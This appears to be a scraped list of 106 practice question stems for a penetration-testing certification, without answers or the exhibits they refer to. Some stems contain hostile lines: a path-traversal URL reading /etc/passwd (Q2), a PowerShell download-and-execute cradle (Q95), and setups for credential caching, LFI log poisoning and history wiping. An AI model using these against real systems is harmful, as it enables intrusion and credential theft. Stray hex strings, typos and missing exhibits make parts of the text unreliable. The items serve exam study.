MoreExam
1. Question Content...
EXPLANATION
Answer: X - EXPLANATION Content.
Question1: A penetration tester was able to enter an SQL injection command into a text box and gain access to the information store on the database. Which of the following is the BEST recommendation that would mitigate the vulnerability?
Question2: A penetration tester entered the following information into the browser URL:https://www.example.com/login.php?file=../../../../../../../etc/passwdThe server responded with the data contained in the server's sensitive data file. Which of the following types of vulnerabilities is MOST likely being exploited?
Question3: An attacker uses SET to make a copy of a company's cloud-hosted web mail portal and sends an email m to obtain the CEO s login credentials Which of the following types of attacks is this an example of?
Question4: Click the exhibit button.A penetration tester is performing an assessment when the network administrator shows the tester a packet sample that is causing trouble on the network. Which of the following types of attacks should the tester stop?
Question5: A penetration tester locates a few unquoted service paths during an engagement. Which of the following can the tester attempt to do with these?
Question6: During an internal penetration test, several multicast and broadcast name resolution requests are observed traversing the network. Which of the following tools could be used to impersonate network resources and collect authentication requests?
Question7: During a penetration test, a tester runs a phishing campaign and receives a shell from an internal PC running Windows 10 OS. The tester wants to perform credential harvesting with Mimikatz.Which of the following registry changes would allow for credential caching in memory?
Question8: D18912E1457D5D1DDCBD40AB3BF70D5DDuring the exploitation phase of a penetration test, a vulnerability is discovered that allows command execution on a Linux web server. A cursory review confirms the system access is only in a low-privilege user context: www-dat a. After reviewing, the following output from /etc/sudoers:Which of the following users should be targeted for privilege escalation?
Question9: During a vulnerability assessment, the security consultant finds an XP legacy system that is running a critical business function. Which of the following mitigations is BEST for the consultant to conduct?
Question10: Which of the following BEST protects against a rainbow table attack?D18912E1457D5D1DDCBD40AB3BF70D5D
Question11: A penetration tester has access to a local machine running Linux, but the account has limited privileges. Which of the following types of files could the tester BEST use for privilege escalation?
Question12: A penetration test was performed by an on-staff junior technician. During the test, the technician discovered the web application could disclose an SQL table with user account and password information. Which of the following is the MOST effective way to notify management of this finding and its importance?
Question13: The results of a basic compliance scan show a subset of assets on a network. This data differs from what is shown on the network architecture diagram, which was supplied at the beginning of the test. Which of the following are the MOST likely causes for this difference? (Select TWO)
Question14: A penetration tester notices that the X-Frame-Optjons header on a web application is not set. Which of the following would a malicious actor do to exploit this configuration setting?
Question15: Which of the following is an important stakeholder to notify when penetration testing has begun?
Question16: The scope of a penetration test requires the tester to be stealthy when performing port scans. Which of the following commands with Nmap BEST supports stealthy scanning?
Question17: A penetration tester executed a vulnerability scan against a publicly accessible host and found a web server that is vulnerable to the DROWN attack. Assuming this web server is using the IP address 127.212.31.17, which of the following should the tester use to verify a false positive?
Question18: A company planned for and secured the budget to hire a consultant to perform a web application penetration test. Upon discovered vulnerabilities, the company asked the consultant to perform the following tasks:* Code review* Updates to firewall setting
Question19: A penetration tester is asked to scope an external engagement. Which of the following would be a valid target?
Question20: Which of the following attacks is commonly combined with cross-site scripting for session hijacking?
Question21: Instructions:Analyze the code segments to determine which sections are needed to complete a port scanning script.Drag the appropriate elements into the correct locations to complete the script.If at any time you would like to bring back the initial state of the simulation, please click the reset all button.During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.
Question22: A penetration tester is performing a code review. Which of the following testing techniques is being performed?
Question23: Joe, a penetration tester, is asked to assess a company's physical security by gaining access to its corporate office. Joe ism looking for a method that will enable him to enter the building during business hours or when there are no employee on-site. Which of the following would be MOST effective in accomplishing this?
Question24: An engineer, who is conducting a penetration test for a web application, discovers the user login process sends from field data using the HTTP GET method. To mitigate the risk of exposing sensitive information, the form should be sent using an:
Question25: A penetration tester is planning to conduct a distributed dictionary attack on a government domain against the login portal. The tester will leverage multiple proxies to mask the origin IPs of the attack. Which of the following threat actors will be emulated?
Question26: After establishing a shell on a target system, Joe, a penetration tester is aware that his actions have not been detected. He now wants to maintain persistent access to the machine. Which of the following methods would be MOST easily detected?
Question27: A penetration tester compromises a system that has unrestricted network over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester mostly like use?
Question28: A penetration tester is testing a banking application and uncovers a vulnerability. The tester is logged in as a non-privileged user who should have no access to any dat a. Given the data below from the web interception proxy Request POST /Bank/Tax/RTSdocuments/ HTTP 1.1 Host: test.com Accept: text/html; application/xhtml+xml Referrer: https://www.test.com/Bank/Tax/RTSdocuments/ Cookie: PHPSESSIONID: ; Content-Type: application/form-data; Response403 Forbidden<tr><td> Error:</td></tr><tr><td> Insufficient Privileges to view the data. </td></tr>Displaying 1-10 of 105 recordsWhich of the following types of vulnerabilities is being exploited?
Question29: A penetration tester has run multiple vulnerability scans against a target system. Which of the following would be unique to a credentialed scan?
Question30: Given the following HTTP response:http/1.0 200 OKServer: ApacheSet-Cookie: AUTHID=879DHUT74D9A7C; http-onlyContent-type: text/htmlConnection: CloseWhich of the following aspects of an XSS attack would be prevented?
Question31: A penetration tester has gained physical access to a facility and connected directly into the internal network.The penetration tester now wants to pivot into the server VLAN. Which of the following would accomplish this?
Question32: A penetration tester has SSH access to a Linux server that is exposed to the internet and has access to a corporate internal network. This server, with IP address 200.111.111.9, only has port TCP 22 externally opened. The penetration tester also discovered the internal IP address 192.168.1.5 from a Windows server. Which of the following steps should the penetration tester follow to open an RDP connection to this Windows server and to try to log on?
Question33: A security team is switching firewall vendors. The director of security wants to scope a penetration test to satisfy requirements to perform the test after major architectural changes. Which of the following is the BEST way to approach the project?
Question34: A consultant is identifying versions of Windows operating systems on a network Which of the following Nmap commands should the consultant run?
Question35: A penetration tester is performing a remote scan to determine if the server farm is compliant with the company's software baseline . Which of the following should the penetration tester perform to verify compliance with the baseline?
Question36: A penetration tester is performing initial intelligence gathering on some remote hosts prior to conducting a vulnerability scan.The tester runs the following command:nmap -p 192.168.1.1, 192.168.1.2, 192.168.1.3 -sV -o --max-rate 2 192.168.1.130 Which of the following BEST describes why multiple IP addresses are specified?
Question37: A penetration tester discovers SNMP on some targets. Which of the following should the penetration tester try FIRST?
Question38: A security guard observes an individual entering the building after scanning a badge. The facility has a strict badge-in and badge-out requirement with a turnstile. The security guard then audits the badge system and finds two log entries for the badge in the following has MOST likely occurred?
Question39: A penetration tester is attempting to capture a handshake between a client and an access point by monitoring a WPA2-PSK secured wireless network. The tester is monitoring the correct channel for the identified network, but has been unsuccessful in capturing a handshake. Given the scenario, which of the following attacks would BEST assist the tester in obtaining this handshake?
Question40: A company's corporate policies state that employees are able to scan any global network as long as it is done within working hours. Government laws prohibit unauthorized scanning. Which of the following should an employee abide by?
Question41: Which of the following BEST explains why it is important to maintain confidentiality of any identified findings when performing a penetration test?
Question42: Which of the following is the BEST way to deploy vulnerability scanners with many networks segmented by firewalls with active IPS rules?
Question43: A penetration tester needs to use Nmap to scan a host with a very low speed so the WAF or IPS/IDS is not triggered. Which of the following command-line parameters should be added to the Nmap command?
Question44: Which of the following is an example of a spear phishing attack?
Question45: A company hires a penetration tester to determine if there are any vulnerabilities in its new VPN concentrator installation with an external IP of 100.170.60.6. Which of the following commands will test if the VPN is available?
Question46: A system security engineer is preparing to conduct a security assessment of some new applications. The applications were provided to the engineer as a set that contains only JAR files. Which of the following would be the MOST detailed method to gather information on the inner working of these applications?
Question47: An email sent from the Chief Executive Officer (CEO) to the Chief Financial Officer (CFO) states a wire transfer is needed to pay a new vendor. Neither is aware of the vendor, and the CEO denies ever sending the email. Which of the following types of motivation was used m this attack?
Question48: A software developer wants to test the code of an application for vulnerabilities. Which of the following processes should the software developer perform?
Question49: Which of the following documents BEST describes the manner in which a security assessment will be conducted?
Question50: A penetration tester is scanning a network for SSH and has a list of provided targets. Which of the following Nmap commands should the tester use?
Question51: A company contracted a firm specializing in penetration testing to assess the security of a core business application. The company provided the firm with a copy of the Java bytecode. Which of the following steps must the firm take before it can run a static code analyzer?
Question52: An internal network penetration test is conducted against a network that is protected by an unknown NAC system In an effort to bypass the NAC restrictions the penetration tester spoofs the MAC address and hostname of an authorized system Which of the following devices if impersonated would be MOST likely to provide the tester with network access?
Question53: Instructions:Analyze the code segments to determine which sections are needed to complete a port scanning script.Drag the appropriate elements into the correct locations to complete the script.If at any time you would like to bring back the initial state of the simulation, please click the reset all button.During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.
Question54: Which of the following tools can be used to perform a basic remote vulnerability scan of a website's configuration?
Question55: A penetration tester ran the following Nmap scan on a computer:nmap -aV 192.168.1.5The organization said it had disabled Telnet from its environment. However, the results of the Nmap scan show port 22 as closed and port 23 as open to SSH. Which of the following is the BEST explanation for what happened?
Question56: A client has voiced concern about the number of companies being branched by remote attackers, who are looking for trade secrets. Which of following BEST describes the types of adversaries this would identify?
Question57: Consumer-based IoT devices are often less secure than systems built for traditional desktop computers.Which of the following BEST describes the reasoning for this?
Question58: A penetration tester successfully exploits a system, receiving a reverse shell. Which of the following is a Meterpreter command that is used to harvest locally stored credentials?
Question59: A penetration tester reviews the scan results of a web application. Which of the following vulnerabilities is MOST critical and should be prioritized for exploitation?
Question60: A penetration tester has been asked to conduct a penetration test on a REST-based web service. Which of the following items is required?
Question61: A recent vulnerability scan of all web servers in an environment offers the following results:Taking a risk-based approach, which of the following is the BEST order to approach remediation based on exposure?
Question62: A client is asking a penetration tester to evaluate a new web application for availability. Which of the following types of attacks should the tester use?
Question63: A client has scheduled a wireless penetration test. Which of the following describes the scoping target information MOST likely needed before testing can begin?
Question64: A penetration tester is performing a code review against a web application Given the following URL and source code:Which of the following vulnerabilities is present in the code above?
Question65: A consultant is performing a social engineering attack against a client. The consultant was able to collect a number of usernames and passwords using a phishing campaign. The consultant is given credentials to log on to various employees email accounts. Given the findings, which of the following should the consultant recommend be implemented?
Question66: While conducting information gathering, a penetration tester is trying to identify Windows hosts. Which of the following characteristics would be BEST to use for fingerprinting?
Question67: A client has requested an external network penetration test for compliance purposes. During discussion between the client and the penetration tester, the client expresses unwillingness to add the penetration tester's source IP addresses to the client's IPS whitelist for the duration of the test. Which of the following is the BEST argument as to why the penetration tester's source IP addresses should be whitelisted?
Question68: When conducting reconnaissance against a target, which of the following should be used to avoid directory communicating with the target?
Question69: An attacker is attempting to gain unauthorized access to a WiR network that uses WPA2-PSK Which of the following attack vectors would the attacker MOST likely use?
Question70: During an internal network penetration test, a tester recovers the NTLM password hash tor a user known to have full administrator privileges on a number of target systems Efforts to crack the hash and recover the plaintext password have been unsuccessful Which of the following would be the BEST target for continued exploitation efforts?
Question71: A penetration tester is required to report installed shells on compromised systems. Which of the following is the reason?
Question72: Click the exhibit button.Given the Nikto vulnerability, scan output shown in the exhibit, which of the following exploitation techniques might be used to exploit the target system? (Choose two.)
Question73: A software development team recently migrated to new application software on the on-premises environment Penetration test findings show that multiple vulnerabilities exist If a penetration tester does not have access to a live or test environment, a test might be better to create the same environment on the VM Which of the following is MOST important for confirmation?
Question74: A malicious user wants to perform an MITM attack on a computer. The computer network configuration is given below:IP: 192.168.1.20NETMASK: 255.255.255.0DEFAULT GATEWAY: 192.168.1.254DHCP: 192.168.1.253DNS: 192.168.10.10, 192.168.20.10Which of the following commands should the malicious user execute to perform the MITM attack?
Question75: A penetration tester is reviewing the following output from a wireless sniffer:Which of the following can be extrapolated from the above information?
Question76: A penetration tester is utilizing social media to gather information about employees at a company. The tester has created a list of popular words used in employee profile s. For which of the following types of attack would this information be used?
Question77: A company planned for and secured the budget to hire a consultant to perform a web application penetration test. Upon discovering vulnerabilities, the company asked the consultant to perform the following tasks:Code reviewUpdates to firewall settingsWhich of the following has occurred in this situation?
Question78: A penetration tester calls human resources and begins asking open-ended questions Which of the following social engineering techniques is the penetration tester using?
Question79: Which of the following is the BEST initial attack against an identified FTP server on the remote network?
Question80: You are a penetration tester running port scans on a server.INSTRUCTIONSPart1: Given the output, construct the command that was used to generate this output from the available options.Part2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.Part1Part2
Question81: Which of the following properties of the penetration testing engagement agreement will have the largest impact on observing and testing production systems at their highest loads?
Question82: Which of the following CPU register does the penetration tester need to overwrite in order to exploit a simple butter overflow?
Question83: A security consultant finds a folder in "C VProgram Files" that has writable permission from an unprivileged user account Which of the following can be used to gam higher privileges?
Question84: Which of the following exploits a vulnerability associated with IoT devices?
Question85: An individual has been hired by an organization after passing a background check. The individual has been passing information to a competitor over a period of time. Which of the following classifications BEST describes the individual?
Question86: After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user's folder titled "changepass"-sr -xr -x 1 root root 6443 Oct 18 2017 /home/user/changepassUsing "strings" to print ASCII printable characters from changepass, the tester notes the following:$ strings changepassExitsetuidstrmpGLINC _2.0ENV_PATH%s/changepwmallocstrlenGiven this information, which of the following is the MOST likely path of exploitation to achieve root privileges on the machines?
Question87: A penetration tester has performed a security assessment for a startup firm. The report lists a total of ten vulnerabilities, with five identified as critical. The client does not have the resources to immediately remediate all vulnerabilities. Under such circumstances, which of the following would be the BEST suggestion for the client?
Question88: A penetration tester is testing a web application and is logged in as a lower-privileged user. The tester runs arbitrary JavaScript within an application, which sends an XMLHttpRequest, resulting in exploiting features to which only an administrator should have access. Which of the following controls would BEST mitigate the vulnerability?
Question89: Prior to a security assessment of a company's user population via spear phishing, which of the following is the MOST appropriate method to de-escalate any incidents or consequences?
Question90: A penetration tester identifies prebuilt exploit code containing Windows imports for VirtualAllocEx and LoadLibraryA functions. Which of the following techniques is the exploit code using?
Question91: When negotiating a penetration testing contract with a prospective client, which of the following disclaimers should be included in order to mitigate liability in case of a future breach of the client's systems?
Question92: Which of the following types of physical security attacks does a mantrap mitigate-?
Question93: A tester has determined that null sessions are enabled on a domain controller. Which of the following attacks can be performed to leverage this vulnerability?
Question94: A client's systems administrator requests a copy of the report from the penetration tester, but the systems administrator is not listed as a point of contact or signatory. Which of the following is the penetration tester's BEST course of action?
Question95: Consider the following PowerShell command:powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/ script.ps1");Invoke-Cmdlet Which of the following BEST describes the actions performed this command?
Question96: An attacker performed a MITM attack against a mobile application. The attacker is attempting to manipulate the application's network traffic via a proxy tool. The attacker only sees limited traffic as cleartext. The application log files indicate secure SSL/TLS connections are failing. Which of the following is MOST likely preventing proxying of all traffic?
Question97: Given the following Python code:a = 'abcdefghijklmnop'a[::2]Which of the following will result?
Question98: A penetration tester identifies the following findings during an external vulnerability scan:Which of the following attack strategies should be prioritized from the scan results above?
Question99: During a full-scope security assessment, which of the following is a prerequisite to social engineer a target by physically engaging them?
Question100: A penetration tester is exploiting the use of default public and private community strings Which of the following protocols is being exploited?
Question101: A penetration tester is preparing to conduct API testing Which of the following would be MOST helpful in preparing for this engagement?
Question102: A web server is running PHP, and a penetration tester is using LFI to execute commands by passing parameters through the URL. This is possible because server logs were poisoned to execute the PHP system ( ) function. Which of the following would retrieve the contents of the passwd file?
Question103: A penetration tester runs the following on a machine:Which of the following will be returned?
Question104: After successfully exploiting a local file inclusion vulnerability within a web application a limited reverse shell is spawned back to the penetration tester's workstation Which of the following can be used to escape the limited shell and create a fully functioning TTY?
Question105: A penetration tester has successfully exploited an application vulnerability and wants to remove the command history from the Linux session. Which of the following will accomplish this successfully?
Question106: A penetration tester wants to script out a way to discover all the RPTR records for a range of IP addresses. Which of the following is the MOST efficient to utilize?